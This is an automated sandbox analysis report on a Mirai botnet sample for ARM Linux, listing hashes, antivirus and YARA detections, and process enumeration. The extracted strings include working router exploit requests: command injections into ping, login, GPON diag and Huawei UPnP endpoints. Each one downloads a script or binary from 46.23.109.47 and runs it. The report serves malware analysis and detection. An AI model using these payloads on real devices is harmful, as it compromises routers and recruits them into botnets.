Linux Analysis Report
Kr9mYMyujR

Overview

General Information

Sample Name: Kr9mYMyujR
Analysis ID: 679624
MD5: 8b9b5682e14d09f74ef586ebd9c2023a
SHA1: d843aa17a4843b19a9bb67839e0a6a565dc8c99b
SHA256: 4531055787bdf40bc227b678922785a5f8e3994bf3efd2f611cc50d408a0f8dc
Tags: 32armelfmirai
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

barindex
Source: Kr9mYMyujR Avira: detected
Source: Kr9mYMyujR Virustotal: Detection: 62% Perma Link
Source: Kr9mYMyujR Metadefender: Detection: 34% Perma Link
Source: Kr9mYMyujR ReversingLabs: Detection: 69%
Source: /tmp/Kr9mYMyujR (PID: 6228) Socket: 127.0.0.1::44455 Jump to behavior
Source: Kr9mYMyujR String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: Kr9mYMyujR String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: Kr9mYMyujR String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Kr9mYMyujR String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Kr9mYMyujR String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Kr9mYMyujR, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f925803d000.00007f925803e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6231.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6231.1.00007f925803d000.00007f925803e000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6232/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6236/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6190/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/910/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/912/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/517/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/759/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/918/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6240/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6242/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6247/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6246/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/761/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/884/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/800/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/801/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6237/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6252/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6251/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6254/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6255/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/491/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6250/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/772/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/774/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/654/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/896/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/655/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/656/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/777/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/657/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/4466/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/658/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/4469/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/419/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/936/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6261/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/6260/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/420/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/785/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/1642/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/788/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/667/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6230) File opened: /proc/789/exe Jump to behavior
Source: /tmp/Kr9mYMyujR (PID: 6228) Queries kernel information via 'uname': Jump to behavior
Source: Kr9mYMyujR, 6228.1.000056150d74f000.000056150d87d000.rw-.sdmp, Kr9mYMyujR, 6231.1.000056150d74f000.000056150d87d000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: Kr9mYMyujR, 6228.1.000056150d74f000.000056150d87d000.rw-.sdmp, Kr9mYMyujR, 6231.1.000056150d74f000.000056150d87d000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/arm
Source: Kr9mYMyujR, 6228.1.00007ffe0d657000.00007ffe0d678000.rw-.sdmp, Kr9mYMyujR, 6231.1.00007ffe0d657000.00007ffe0d678000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: Kr9mYMyujR, 6228.1.00007ffe0d657000.00007ffe0d678000.rw-.sdmp, Kr9mYMyujR, 6231.1.00007ffe0d657000.00007ffe0d678000.rw-.sdmp Binary or memory string: 4x86_64/usr/bin/qemu-arm/tmp/Kr9mYMyujRSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Kr9mYMyujR

Stealing of Sensitive Information

barindex
Source: Yara match File source: Kr9mYMyujR, type: SAMPLE
Source: Yara match File source: 6228.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: Kr9mYMyujR, type: SAMPLE
Source: Yara match File source: 6228.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.00007f9258017000.00007f9258034000.r-x.sdmp, type: MEMORY
No contacted IP infos